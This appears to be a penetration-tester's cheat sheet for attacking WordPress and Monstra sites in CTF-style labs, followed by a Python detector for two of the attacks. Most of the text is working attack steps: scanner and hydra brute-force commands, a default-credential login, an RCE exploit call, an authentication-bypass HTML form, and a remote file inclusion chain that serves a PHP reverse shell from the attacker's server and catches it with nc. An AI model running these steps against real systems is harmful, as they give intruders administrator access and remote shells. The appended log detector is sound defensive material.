# Wordpress

## Investigate

```
https://$IP/webservices/wp
https://$IP/webservices/wp/wp-login.php

/wordpress/   ..suggests we have a very fertile ground for planting an attack. User access = shell.
/phpmyadmin/  ..suggests there is a database ready to plunder.
/info.php     ..gives us kernel, hostname and OS information immediately.
```

## wpscan

```
Wordpress vuln scanner
> wpscan --url $IP
> wpscan --url https://$IP --disable-tls-checks

Enum plugins
> wpscan --url http://$IP/webservices/wp/ --enumerate p
> wpscan --url http://$IP/webservices/wp -e ap --log wpscan.out  ..ap = all plugins

Enum plugins/themes/users
> wpscan --url http://$IP/webservices/wp -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive --api-token GetYourOwnAPIKey 2>&1

Brute with known user: 'elliot'
> wpscan --url 192.168.50.102 -U elliot --passwords ./fsocity_uniq.dic
```

## Monstra

```
https://$IP/webservices/monstra-3.0.4/
https://$IP/webservices/monstra-3.0.4/admin/

admin:admin  ..default works!

Try to edit themes!
They are often php

Monstra > Extends > Themes
"Helloworld" > Save ..fails

System > Backup ..not created (not writeable)
Content > Files ..new directory (created)
Content > Files > File ..fails

System > Settings > Maintenance Mode
<?php phpinfo(); ?>   ..Save fails
Hello                 ..Save fails

-----------------------
searchsploit monstra
github monstra > Issues >
php code execution
Look for sqli or lfi
```

## Wordpress RCE Exploits

```
wordpress-rce-exploit.sh 
wordpress-rce-exploit.py  --python version

> sudo python ./wordpress-rce-exploit.py http://$IP/wp-login.php $MyIP:4444 admin
```

## wp curl trick

```
Tries to catch the 'enter new password link'
> curl -H "Host: $IP" --data "user_login=admin&redirect_to=&wp-submit=Get+New+Password" http://$IP/wp-login.php?action=lostpassword
```

## wp-support-plus-responsive-ticket-system

```
> wpscan --url https://$IP --disable-tls-checks

wp-support-plus-responsive-ticket-system
Version: 7.1.3 


> searchsploit -x 41006.txt

<form method="post" action="http://wp/wp-admin/admin-ajax.php">
        Username: <input type="text" name="username" value="administrator">
        <input type="hidden" name="email" value="sth">
        <input type="hidden" name="action" value="loginGuestFacebook">
        <input type="submit" value="Login">
</form>

Save as hello.html
Serve: python3 -m http.server
http://localhost/hello.html

Reload page - Now Admin!!
https://brainfuck.htb/?page_id=6
https://brainfuck.htb/wp-admin/admin-ajax.php
```

## Brute Force Username - [Hydra](/05-passwords-ciphers/hydra.md)

```
> hydra -vV -L users.dic -p wedontcare 192.168.50.102 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'
```

## Gwolle Guestbook RFI

* TartarsauceHTB
* Check your version:
  * <http://$IP/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt>
* Basically:
  * `http://$IP/...ajaxresponse.php?abspath=http://$MyIP/` (note the trailing `/`)
  * Place an evil `wp-load.php` (actually a reverse PHP shell) on your local web server

```
-------------------------
searchsploit gwolle
searchsploit -x 38861  ..read
Remote File Inclusion (RFI) - Found for 1.5.3

-------------------------
RFI:
http://$IP/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://$MyIP

-------------------------
Prep:
locate php-reverse
cp /usr/share/webshells/php/php-reverse-shell.php wp-load.php
vim wp-load.php
python -m SimpleHTTPServer 80

-------------------------
Exploit:
curl -s http://$IP/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://$MyIP/
(keep the trailing / or else this won't work)
nc -lvnp 7500
connected!
```
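A defender-side check for the two patterns in these notes, added here as an example that is not part of the original cheat sheet: it scans web-server access-log lines for the gwolle-gb `abspath=` remote-URL inclusion request and for repeated POSTs to `wp-login.php` from one address (the hydra/wpscan brute-force pattern). The log lines, addresses and threshold are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format sample lines (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://203.0.113.9/ HTTP/1.1" 200 512 "-" "curl/7.88"
10.0.0.6 - - [01/Jan/2024:10:00:02 +0000] "GET /webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=/var/www/html/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:10:01:00 +0000] "POST /wp-login.php HTTP/1.1" 200 3200 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:10:01:01 +0000] "POST /wp-login.php HTTP/1.1" 200 3200 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:10:01:02 +0000] "POST /wp-login.php HTTP/1.1" 200 3200 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:10:01:03 +0000] "POST /wp-login.php HTTP/1.1" 200 3200 "-" "Mozilla/5.0"
10.0.0.8 - - [01/Jan/2024:10:02:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Client IP, method, request target and status from a combined-format line.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def is_rfi_attempt(target):
    """True when the gwolle-gb captcha endpoint is called with a URL in abspath=.
    A local filesystem path in abspath is the plugin's own usage and is not flagged."""
    parts = urlsplit(target)
    if not parts.path.endswith("/gwolle-gb/frontend/captcha/ajaxresponse.php"):
        return False
    for value in parse_qs(parts.query).get("abspath", []):
        if re.match(r"^[a-z][a-z0-9+.-]*://", value, re.I):  # any URL scheme, e.g. http://
            return True
    return False

def analyse(log_text, login_threshold=3):
    """Return RFI hits and addresses exceeding login_threshold POSTs to wp-login.php.
    The threshold is an illustrative value; tune it to the site's real login rate."""
    rfi_hits = []
    login_posts = Counter()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        if is_rfi_attempt(m["target"]):
            rfi_hits.append((m["ip"], m["target"]))
        if m["method"] == "POST" and urlsplit(m["target"]).path.endswith("/wp-login.php"):
            login_posts[m["ip"]] += 1
    bruteforcers = sorted(ip for ip, n in login_posts.items() if n >= login_threshold)
    return {"rfi": rfi_hits, "bruteforce": bruteforcers}

if __name__ == "__main__":
    print(analyse(SAMPLE_LOG))
```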
